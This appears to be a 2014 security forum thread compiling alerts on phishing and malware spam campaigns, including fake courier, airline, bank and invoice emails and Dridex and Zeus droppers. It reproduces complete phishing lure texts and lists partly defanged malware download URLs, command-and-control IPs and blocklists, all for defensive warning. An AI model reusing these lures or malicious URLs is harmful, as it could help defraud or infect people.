4 Dec 2014 - "'FedEx Delivery Notification. (Confirmation)' pretending to come from FedEx Courier Delivery <FedExdelivery@ FedEx .com> is a phishing scam. When I first saw these emails start to come in, I thought it was a follow 0n to the current malware spreading campaign Fedex Unable to deliver your item, #00486182 malware but no, it is a pure and simple phishing scam trying to get you to voluntarily give your details. It is most likely a 419 scam which will ask for a fee to expedite the delivery. Just look at all the spelling and grammar mistakes in the email, but of course most victims just don’t read emails closely, just blindly follow instructions and do what is asked without thinking. Email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/fedex_delivery_phish.jpg

... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___

Fake Air Canada emails with ticket and flight confirmation leads to malicious ZIP file
- http://blog.mxlab.eu/2014/12/03/new-fake-air-canada-emails-with-ticket-and-flight-confirmation-leads-to-malicious-zip-file/
Dec 3, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
Order #70189189901 successfully – Ticket and flight details
Order #70189101701 paid – E-ticket and flight details
This email is sent from the -spoofed- address “Aircanada .com” <tickets@ aircanada .com>” and has the following body:
Dear client,
Your order has been successfully processed and your credit card charged.
ELECTRONIC TICKET – 70189101701
FLIGHT – QB70189101701CA
DATE / TIME – Dec 4th 2014, 15:30
ARRIVING – Quebec
TOTAL PRICE / 575.00 CAD
Your ticket can be downloaded and printed from the following URL: ...
hxxps ://www.aircanada .com/travelInformation/viewOrderInfo.do?ticket_number=70189101701& view_pdf=yes
For information regarding your order, contact us by visiting our website: ...
Thank you for choosing Air Canada

The embedded URL does -not- point the browser to the real web site address but to hxxp ://ravuol .com/wp-content/plugins/revslider/temp/update_extract/revslider/pdf_ticket_QB70189189901CA.zip. Once this file is extracted you will have the 209 kB large file pdf_ticket_QB70189189901CA.pif. The trojan is known as Trojan.MalPack or a variant of Win32/Injector.BQPL. This trojan has the ability to fingerprint the system, start a server listening on a local machine, create Zeus mutexes, installs itself to autorun, modifies local firewall and policies. At the time of writing, 2 of the 52* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8aba09320c5a5844ceb64ef06624eda221578667a1fa59feb3b2c94aabae96fb/analysis/

ravuol .com / 192.232.218.114: https://www.virustotal.com/en/ip-address/192.232.218.114/information/

:mad: :fear:

FYI...

Fake Voicemail SPAM - wav malware
- http://myonlinesecurity.co.uk/stuartclark146-voicemail-message-01438351556night-message-fake-wav-malware/
5 Dec 2014 - "'Voicemail Message (01438351556>Night Message) From:01438351556' pretending to come from stuartclark146@ gmx .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

IP Office Voicemail redirected message

5 December 2014: voicemsg.wav.zip : Extracts to: voicemsg.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a8d7a7b4c76fa4456b2aa0fd0107ef500382075a56b93564af037dd322232a9f/analysis/1417779780/
___

Fake Remittance Advice SPAM
- http://blog.dynamoo.com/2014/12/k-j-watking-co-fake-remittance-advice.html
5 Dec 2014 - "... The spam comes with an Excel spreadsheet which contains a malicious macro.
Some sample spams are as follows:
From: Brenton Glover
Date: 5 December 2014 at 07:20
Subject: Remittance Advice for 430.57 GBP
Please find attached a remittance advice for recent BACS payment.
Any queries please contact us.
Brenton Glover
Senior Accounts Payable Specialist
K J Watking & Co

I have seen two versions of these, neither of which are detected as malicious by any vendors [1] [2]. Each spreadsheet contains a different but similar malicious macro... which then download a binary... Recommended blocklist:
194.146.136.1
84.92.26.50
79.137.227.123
124.217.199.218 "
1] https://www.virustotal.com/en/file/84f5c7cca1d8d0d35dbe541a406a8ff188b46624248c60214f00d91faf219d66/analysis/1417773044/

2] https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417773050/

- http://myonlinesecurity.co.uk/k-j-watking-co-remittance-advice-excel-malware/
5 December 2014 : BAC_002163F.xls (253KB) - Current Virus total detections: 0/55*
* https://www.virustotal.com/en/file/66ed083beb750b7c2d65210607f52ff2136dbdb9b9b89dfe88fdbef3c9cf826e/analysis/1417779426/
5 December 2014 : BAC_644385B.xls (290KB) - Current Virus total detections: 0/55**
** https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417779139/

- http://blog.mxlab.eu/2014/12/05/email-remittance-advice-for-245-58-gbp-contains-malicious-xls-file/
Dec 5, 2014
> https://www.virustotal.com/en/file/367b3c188d2dc322c03de0204c66d4c7217a998c879c9ad471ba8e1f8db6a2c4/analysis/1417768835/
___

Fake Order/Invoice SPAM - malicious .doc attachment
- http://blog.dynamoo.com/2014/12/mathew-doleman-lightmoorhomescouk-spam.html
5 Dec 2014 - "This -spam- came through into my mailbox horribly mangled and needed some assembly to make it malicious (everything was in a Base 64 attachment). After some work it appears to have a malicious Word document attached.
From: Mathew Doleman [order@ lightmoorhomes .co .uk]
Date: 5 December 2014 at 08:32
Subject: Order no. 98348936010
Thank you for using our services!
Your order #98348936010 will be shipped on 08-12-2014.
Date: December 04, 2014
Price: 177.69
Payment method: Credit card
Transaction number: OVFTMZERLXVNPXLPXB
Please find the detailed information on your purchase in the attached file (2014-12-4_12-32-28_98348936010.doc)
Best regards,
Sales Department
Mathew Doleman
+07966 566663

The attachment is 2014-12-4_12-32-28_98348936010.doc which looks like an old-style .DOC file, but is actually a newer format .DOCX document, which is poorly detected by AV vendors* ... Some investigation shows that it contains a malicious macro... The macro downloads a file from http ://hiro-wish .com/js/bin.exe which is completely undetected by any AV vendor** at present... The VirusTotal report** shows it phoning home to:
46.4.232.200 (Dmitry Zheltov / Hetzner, Germany)
Recommended blocklist:
203.172.141.250
46.4.232.200
74.208.11.204
hiro-wish .com "
* https://www.virustotal.com/en/file/cbb8823189d908b7f11f4c51da179a0a43a93da4ecff6e83e2db7ab99a444717/analysis/1417776108/

** https://www.virustotal.com/en/file/e167ed90258a88c8f63338a76d5d92feb6f97702fba6c99e9c3300014fcc08b3/analysis/1417775973/
___

Fake 'Package delivery failed' SPAM - PDF malware
- http://myonlinesecurity.co.uk/package-delivery-failed-fake-pdf-malware/
5 Dec 2014 - "'Package delivery failed' pretending to come from Canada Post with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: Canada Post [mailto:shipping@ canadapost .ca]
Sent: December 5, 2014 2:31
To: e-Bills – [redacted]
Subject: Package delivery failed
Image removed by sender.
Dear customer,
A delivery attempt has been made on December 3rd, 2014.
The delivery failed because nobody was present at the receiver’s address.
Redelivery can be arranged by visiting our nearest office and presenting a printed copy of the shipping invoice.
TRACKING Number: 3765490000465274
Originating from : RICHMOND
The shipping invoice, necessary for the redelivery arrangements can be automatically downloaded by visiting the tracking section, in our website: ...

5 December 2014: canpost_3765490000465274_trk.zip: Extracts to:
canpost_3765490000465274_trk.pif . Current Virus total detections: 5/55*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/45469fa9aa80014b868ac02fc18997fcad8a25ee7b758cd5358897e126c81929/analysis/1417725574/
___

Halifax phish...
- http://myonlinesecurity.co.uk/halifax-phishing/
5 Dec 2014 - "This Halifax phishing attempt starts with an email saying 'Your Account' pretending to come from Halifax <update@halifax .co .uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. This one only wants your personal details,and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well:
1] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_phish_email.jpg
...
2] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_fake-site.jpg
... the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format..."

:mad: :fear:

FYI...

Fake Invoice SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/soo-sutton-invoice-224245-from-power-ec.html
8 Dec 2014 - "... this -fake- invoice comes with a malicious Word document attached.
From: soo.sutton966@ powercentre .com
Date: 8 December 2014 at 10:57
Subject: INVOICE 224245 from Power EC Ltd
Please find attached INVOICE number 224245 from Power EC Ltd

Attached are one of two Word documents -both- with the name 224245.doc but with slightly different macros. Neither are currently detected by any AV vendors [1] [2]. Inside the DOC is one of two malicious macros... which then downloads an executable from one of the following locations:
http ://aircraftpolish .com/js/bin.exe
http ://gofoto .dk/js/bin.exe
This file is then saves as %TEMP%\CWRSNUYCXKL.exe and currently has zero detections at VirusTotal. The ThreatExpert report shows that it connects to:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1 Internet, US)
According to the Malwr report this executable drops a DLL with a slightly better detection rate of 5/53*.
Recommended blocklist:
203.172.141.250
74.208.11.204
aircraftpolish .com
gofoto .dk "
1] https://www.virustotal.com/en/file/638c38749b79a38a18d641e3b170e7feeebba21ab3b31ca2d98c5abc5832a150/analysis/1418035603/

2] https://www.virustotal.com/en/file/84d0d1b9544ae8862792796a7ef06e5924919c8ac9fe8b1fb495a4e2df98ed22/analysis/

* https://www.virustotal.com/en/file/8826cc73859b551a7f63db428e13924deeb969b45a7ac8d2cc9b6a4018511c88/analysis/1418037172/

- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
8 Dec 2014
___

Fake 'Transaction confirmation' SPAM - doc malware
- http://myonlinesecurity.co.uk/shipping-status-transaction-confirmation-fake-word-doc-malware/
8 Doc 2014 - "'Shipping status: Transaction confirmation' with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subjects include (all having random numbers, senders, sales clerks names, telephone numbers, order numbers and amounts. Most pretend to come from sale@ or order@ < random company> )
Shipping status: Transaction confirmation: 77951286043
Order info: 50664959001
Payment info: 22908714125
Payment confirmation: 6322896965

They look like:
Shipping status: Transaction confirmation: 77951286043Greetings,
Your order #77951286043 will be shipped on 16.12.2014.
Date: December 08, 2014. 01:27pm
Price: £163.10
Transaction number: 43595D828F1A5A
Please find the detailed information on your purchase in the attached file order2014-12-08_77951286043.zip
Yours truly,
Sales Department
Keisha Konick ...
-or-
Hello,
Your order #50664959001 will be shipped on 17-12-2014.
Date: December 08, 2014. 01:49pm
Price: £181.71
Transaction number: 1E51D75638EEDA4499
Please find the detailed information on your purchase in the attached file item2014-12-08_50664959001.zip
Kind regards,
Sales Department
Sanjuanita Mandeville ...

Every single attachment received so far today (and there are hundreds) has a different file # so it is difficult to get a viable detection rate at Virus total. The zip attachment extracts to another zip & then to a scr file with an icon looking like it is a word doc.
8 December 2014: order2014-12-08_77951286043.zip: Extracts to: sale2014-12-08_97164185939.scr
Current Virus total detections: 3/55* .
8 December 2014: item2014-12-08_24831482215.zip: Extracts to: item2014-12-08_79359848638.scr
Current Virus total detections: 5/55**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/89be5f270a6a3db81b3e0bb84a1bbcfd228d12454eedd7537a5aa38361542f3c/analysis/1418050446/
... Behavioural information
TCP connections
157.56.96.55: https://www.virustotal.com/en/ip-address/157.56.96.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.96: https://www.virustotal.com/en/ip-address/95.101.0.96/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/

** https://www.virustotal.com/en/file/8c968020120ca70d9d56102d3576d0d9e562a57413b7d437d9b4019a8a96b02f/analysis/1418050480/
... Behavioural information
TCP connections
191.232.80.55: https://www.virustotal.com/en/ip-address/191.232.80.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.90: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___

Fake HSBC Advising SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/08/fake-email-from-hsbc-advising-service-leads-to-malware/
Dec 8, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Payment Advice – Advice Ref:[GB659898] / CHAPS credits” (number in subject will vary). This email is sent from the spoofed address “HSBC Advising Service <advising.service@ hsbc .com>” and has the following body:
Sir/Madam,
Please download document from dropbox, payment advice is issued at the request of our customer. The advice is or your reference only.
Download link: ...
Yours faithfully,
Global Payments and Cash Management
HSBC ...

In this sample, the embedded URl directs us to hxxp ://paparellalogistica .it/banking/document.php where the file documentXXX.zip (name contains number that will vary) is downloaded.The trojan is known as Upatre-FAAJ!BADD639EC640, HB_Arkam or Virus.Win32.Heur.c. The trojan will create a new service gtpwz.exe on the system, modify some Windows registry and can connect to the IP 62.210.204.149 on port 33294 and 33321 for outbound traffic. At the time of writing, 5 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/2ed5903942b5299ea69183aa040343338d220b66742c510c0895766fe0b70b9a/analysis/
... Behavioural information
TCP connections
62.210.204.149: https://www.virustotal.com/en/ip-address/62.210.204.149/information/
188.132.235.180: https://www.virustotal.com/en/ip-address/188.132.235.180/information/
UDP communications
208.97.25.20: https://www.virustotal.com/en/ip-address/208.97.25.20/information/
208.97.25.6: https://www.virustotal.com/en/ip-address/208.97.25.6/information/

:fear: :mad:

FYI...

Something evil on 5.196.33.8/29
- http://blog.dynamoo.com/2014/12/something-evil-on-519633829.html
9 Dec 2014 - "This Tweet* from @Kafeine about the Angler EK drew my attention to a small block of OVH UK addresses of 5.196.33.8/29 which appear to be completely dedicated to distributing malware.
Specifically, VirusTotal lists badness on the following IPs:
5.196.33.8: https://www.virustotal.com/en/ip-address/5.196.33.8/information/
5.196.33.9: https://www.virustotal.com/en/ip-address/5.196.33.9/information/
5.196.33.10: https://www.virustotal.com/en/ip-address/5.196.33.10/information/
There are also some doubtful looking IP addresses on 5.196.33.15** which may we have a malicious purpose... suggest that you treat them as malicious.
Recommended blocklist:
5.196.33.8/29 ..."
(Long list at the dynamoo URL at the top of this post.)
* https://twitter.com/kafeine/status/541550193649680385

** https://www.virustotal.com/en/ip-address/5.196.33.15/information/
___

Fake 'UPS Customer Service' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ups-customer-service-fake-pdf-malware/
9 Dec 2014 - "'UPS Customer Service' pretending to come from UPS Customer Service [mailto:upsdi@ ups .com] is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: UPS Customer Service [mailto:upsdi@ ups .com]
Sent: December 9, 2014 11:25
To: [redacted]
Subject: [SPAM] UPS Customer Service
IMPORTANT DELIVERY
Dear [redacted]
You have received an important delivery from UPS Customer Service.
Please pick up the ePackage at the following Web address:
The ePackage will expire on Thursday December 11, 2014, 00:00:00 EDT
…………………………………………………………….
HOW TO PICK UP YOUR ePackage
* If the Web address above is highlighted, click on it to open a browser window. You will automatically be taken to the ePackage.
* If the Web address above is not highlighted, then follow these steps:
– Open a web browser window.
– Copy and paste the entire Web address into the ‘location’ or ‘address’ bar of the browser.
– Press enter.
Once you arrive at the ePackage web page, you can access the attached files and/or private message.
…………………………………………………………….
If you require assistance please contact UPS Customer Service.
Please note: This e-mail was sent from an auto-notification system that cannot accept incoming e-mail. Please do not reply to this message.
This e-mail is intended for the addressee shown. It contains information that is confidential and protected from disclosure. Any review,
dissemination or use of this transmission or its contents by persons or unauthorized employees of the intended organizations is strictly prohibited.
__________________________________
Delivered by UPS ePackage

9 December 2014: ePackage_12092014_42.pdf.zip: Extracts to: ePackage_12092014_42.pdf.scr
Current Virus total detections: 0/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8be655497ded041cc896788e543e5dad24a5dea518f9d869e376948b004c2e71/analysis/1418149697/
... Behavioural information
TCP connections
54.225.211.214: https://www.virustotal.com/en/ip-address/54.225.211.214/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
___

Phishing SCAM - 'Your Email Address Transmitting Viruses'
- http://www.hoax-slayer.com/email-address-transmitting-viruses-phishing.shtml
Dec 9, 2014 - "... The email is -not- from any email administrator or service provider. It is a phishing scam designed to steal your account login details via a fake login form. If you click the link and login on the -fake- site, your email account may be hijacked by criminals and used for spam and scam campaigns... Example:

Subject: Take note [email address removed]: Your email address will be terminated now
Dear [email address removed]
Your email address (removed) has been transmitting viruses to our servers and will be deactivated permanently if not resolved.
You are urgently required to sanitize your email or your access to email services will be terminated
Click here now to scan and sanitize your e-mail account
Note that failure to sanitize your email account immediately will lead to permanent deactivation without warning.
We are very sorry for the inconveniences this might have caused you and we assure you that everything will return to normal as soon as you have done the needful.
Admin

According to this email, which claims - rather vaguely - to be from 'Admin', your email has been transmitting viruses to the sender's servers. The email warns that your account will be deactivated permanently if you do not resolve the issue. The message instructs you to 'urgently' click a link to run a scan and 'sanitize your e-mail account'... Clicking the link takes you to a fraudulent webpage that includes a stolen Norton Antivirus logo and a login box (See screenshot below*). The page instructs you to login with your email address and password to run a 30 second scan. After 'logging in', a 'Please wait - scanning' message will be displayed for a few seconds. Finally, a 'Scan Complete' message will be shown. At this point, you may believe that the viruses have been removed and you have successfully resolved the issue... however, the criminals behind the scam can collect your login details and hijack your real email account. They may use the hijacked account to launch further spam and scam campaigns in your name..."
* http://www.hoax-slayer.com/images/email-address-tansmitting-viruses.jpg

:mad: :fear:

FYI...

Fake 'Remittance Advice' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/spam-remittance-advice-from-anglia.html
10 Dec 2014 - "This spam email does not come from Anglia Engineering Solutions Ltd but instead comes from a criminally-operated botnet and has a malicious attachment.
From: Serena Dotson
Date: 10 December 2014 at 10:33
Subject: Remittance Advice from Anglia Engineering Solutions Ltd [ID 334563N]
Dear ,
We are making a payment to you.
Please find attached a copy of our remittance advice, which will reach your bank account on 11/12/2014.
If you have any questions regarding the remittance please contact us using the details below.
Kind regards
Serena Dotson
Anglia Engineering Solutions Ltd ...

The sender's name, ID number and attachment name vary from spam email to spam email. It comes with one of two Excel attachments, both of which are malicious but are undetected by any AV product [1] [2] which contains one of two malicious macros... which attempts to download an executable from the following locations:
http ://217.174.240.46:8080/stat/lld.php
http ://187.33.2.211:8080/stat/lld.php
This file is downloaded as test.exe and is then copied to %TEMP%\LNUDTUFLKOJ.exe. This executable has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows attempted connections to the following IPs:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
84.92.26.50 (PlusNet, UK)
87.106.246.201 (1&1, Germany)
Traffic to 194.146.136.1 is also confirmed by VirusTotal. The Malwr report shows the same traffic. The payload is most likely Dridex, a banking trojan. I recommend that you block traffic to the following IPs:
194.146.136.1
84.92.26.50
87.106.246.201
217.174.240.46
187.33.2.211 "
1] https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418208470/

2] https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418208468/

* https://www.virustotal.com/en/file/c92200fd311abe6f1e8422781f3eefec7ef2791ab0f43e4552bd27488091da94/analysis/1418208856/

- http://myonlinesecurity.co.uk/remittance-advice-anglia-engineering-solutions-ltd-excel-xls-malware/
10 Dec 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Anglia-Engineering-Solutions.jpg

* https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418209362/

** https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418209779/
___

Fake JPMorgan Chase – ACH – Bank account info SPAM – PDF malware
- http://myonlinesecurity.co.uk/gre-project-accounting-jpmorgan-chase-ach-bank-account-information-form-fake-pdf-malware/
10 Dec 2014 - "'ACH – Bank account information form' pretending to come from random names at jpmchase.com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please fill out and return the attached ACH form along with a copy of a voided check.
Jules Hebert,
JPMorgan Chase
GRE Project Accounting
Vendor Management & Bid/Supervisor
Fax-602-221-2251
Jules.Hebert@ jpmchase .com
GRE Project Accounting

10 December 2014: Check_Copy_Void.zip: Extracts to: Check_Copy_Void.scr
Current Virus total detections: 5/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37ca2089e469332ff3400712726cdb85f4e07ef84d245e9d68b9ed1276dac0d7/analysis/1418238116/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
213.175.194.96: https://www.virustotal.com/en/ip-address/213.175.194.96/information/
UDP communications
107.23.150.92: https://www.virustotal.com/en/ip-address/107.23.150.92/information/
___

Fake 'PRODUCT ENQUIRY' SPAM - jpg malware
- http://myonlinesecurity.co.uk/re-product-enquiry-fake-jpg-malware/
10 Dec 2014 - "'RE: PRODUCT ENQUIRY' coming from a random company with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
We are very interested in your product line. We got your profile from sister-companies. Can you please email me the list of all your Class A products and their prices? How much is the minimum order for shipping? What is the mode of payment and can you ship to Stockholm (SWEDEN)?
Please refer to the attached photo in my email. I was informed that this was purchased from your company. I would also like to order this product. Can you send the product code in your reply.
Thank you very much
Stven Clark
Lindhagensgatan 90,
112 18 Stockholm,
SWEDEN…

10 December 2014: Product Image NO. 1_jpeg…………….. (1).7z:
Extracts to: Product Image NO. GXD46474848494DHW_jpeg…………….. (1).exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d723f44d1d2943966f9ad4e5529af1816bfb51f261e68304241255a68f8c15d7/analysis/1418220978/
___

85% of website scams - China
- http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
10 Dec 2014 - "Chinese internet users are behind 85 per cent of -fake- websites, according to a semi-annual report [PDF*] from the Anti-Phishing Working Group (APWG). Of the 22,679 -malicious- domain registrations that the group reviewed, over 19,000 were registered to servers based in China. This is in addition to nearly 60,000 websites that were hacked in the first half of 2014 and then used to acquire people's details and credit card information while pretending to offer real goods or services. Chinese registrars were also the worst offenders, with nine of the top ten companies with the highest percentages of phished domains based in China. Dot-com domains are the most popular for phishing sites, being used in 51 per cent of cases, but when it comes down to the percentage of phished domains against the number of domains under that registry, the clear winner is the Central African Republic's dot-cf, with more than 1,200 phished domain out of a total of 40,000 (followed by Mali's dot-ml, Palau's dot-pw and Gabon's dot-ga). Despite concerted efforts to crack down on fake websites, little improvement was made on the last report in terms of uptime (although it is significantly lower than when the group first started its work back in 2010). The average uptime of a phishing site was 32 hours, whereas the median was just under 9 hours. As for the phishers' targets: Apple headed the list for the first time being used in 18 per cent of all attacks, beating out perennial favorite PayPal with just 14 per cent. Despite some fears, the introduction of hundreds of new generic top-level domains has not led to a noticeable increase in phishing, according to the report. The authors posit that this may because of the higher average price of new gTLDs, although they expect the new of new gTLD phished domains to increase as adoption grows and websites are compromised. Around 20 per cent of phishing attacks are achieved through hacking of vulnerable shared hosting providers..."
* http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___

Zeus malware thru browser warning: social engineering...
- http://blog.phishlabs.com/zeus-malware-distributed-through-browser-warning-social-engineering-at-its-finest
Dec 5, '14 - "Zeus malware continues to plague the Internet with distributions through spam emails and embeds in compromised corners of the web – all designed to exploit unsuspecting consumers. PhishLabs’ R.A.I.D. (Research Analysis and Intelligence Division) recently observed the Zeus malware being distributed through an alarmingly convincing browser warning that prompts viewers to download and “restore settings”... designed to manipulate viewers so that they believe the alert is based on security preferences that he or she has previously set up. The message creates a sense of urgency and fear, warning of “unusual activity”... Generally speaking, grammar and spelling are often indicators of fake or malicious requests that lead to malware but cybercriminals have caught on to this vulnerability and stepped up their game. Although it is not perfect, the warning observed in this case was much more accurate than what we usually see. The warning states:
"REPORTED BROWSER ONLINE DOCUMENT FILE READER WARNING”. We have detected unusual activities on your browser and the Current Online Document File Reader has been blocked base on your security preferences. It is recommended that you update to the latest version available in order to restore your settings and view Documents."
Browser warning leading to Zeus malware download:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2183047529-png/blog-files/Zeus_Browser_Warning.png
The fake browser warning requires the user to click the "Download and Install" button. Once clicked, the victim is redirected to a site that downloads the Zeus executable (Zbot) malware. The R.A.I.D was able to track the malware back to the Zeus control panel...
Zeus (Zbot) malware control panel:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2184127607-png/blog-files/Zeus_Control_Panel..png
Web users should be on the lookout for this kind of social engineering that capitalizes on fear and misleads users to believe the alert is showing up based on user-defined preferences. Zeus is a dangerous malware that continues to be distributed through sophisticated avenues. In the past, Zeus infections have led to exploitation of machines, making them part of a -botnet-, as well as bank account takeovers and fraud."

:fear::fear: :mad:

FYI...

Fake Invoice 'UK Fuels E-bill' SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/uk-fuels-e-bill-ebillinvoicecom-spam.html
11 Dec 2014 - "This -fake- invoice comes with a malicious attachment:
From: invoices@ ebillinvoice .com
Date: 11 December 2014 at 08:06
Subject: UK Fuels E-bill
Customer No : 35056
Email address : [redacted]
Attached file name : 35056_49_2014.doc
Dear Customer
Please find attached your invoice for Week 49 2014.
In order to open the attached DOC file you will need
the software Microsoft Office Word.
If you have any queries regarding your e-bill you can contact us at invoices@ ebillinvoice .com.
Yours sincerely
Customer Services
UK Fuels Ltd ...

This spam is not from UK Fuels Ltd or ebillinvoice .com and is a forgery. Attached is a malicious Word document which in the sample I have seen is undetected by AV vendors*. This downloads a file from the following location:
http ://KAFILATRAVEL .COM/js/bin.exe
This is downloaded and saved to %TEMP%\LNKCLHSARFL.exe. This binary only has a detection rate of 3/56** at VirusTotal. The Malwr report shows that it POSTs data to 203.172.141.250 (Ministry of Education, Thailand), which has been commonly used in this sort of attack (I strongly recommend that you -block- this IP). It also drops a DLL which is probably Dridex, which has a detection rate of only 1/55***."
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418293134/

** https://www.virustotal.com/en/file/9fae183a06c6980b8f6662156612e395e70cf75aa1c266037fcbbd283e9923ad/analysis/1418293637/

*** https://www.virustotal.com/en/file/a35597d4ae580653b5c26f0e739215e63ab39e74a76903357ed1616d096e1962/analysis/1418294506/

- http://myonlinesecurity.co.uk/uk-fuels-e-bill-word-doc-malware/
11 December 2014 : 35056_49_2014.doc (89kb) Current Virus total detections: 0/56*
35056_49_2014.doc (69kb) Current Virus total detections: 0/56**
* https://www.virustotal.com/en/file/939fb5c4bdfa7a7a5ede2813ec3b4a8ceb17a0247b27f13e9cea590cc6e1bb87/analysis/1418285959/

** https://www.virustotal.com/en/file/1e367459dd260c055f3b51cf22d7d8125cfc14b3d3178d6b3cf60850091f4dc7/analysis/1418285875/
___

Fake 'RBS Important Docs' SPAM – doc malware
- http://myonlinesecurity.co.uk/rbs-important-docs-word-doc-malware/
11 Dec 2014 - "'RBS Important Docs' pretending to come from Lenore Hinkle <Lenore@ rbs .co .uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review attached documents regarding your account.
Tel: 01322 182123
Fax: 01322 011929
email: Lenore@ rbs .co.uk
This information is classified as Confidential unless otherwise stated.

11 December 2014: RBS_Account_Documents.doc (1mb) Current Virus total detections: 1/56*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e1552f04ca253e3910d0b3fa0e96bca3ce43561c2cb53162bad1436b4d5f0de5/analysis/1418306209/
___

REVETON Ransomware spreads ...
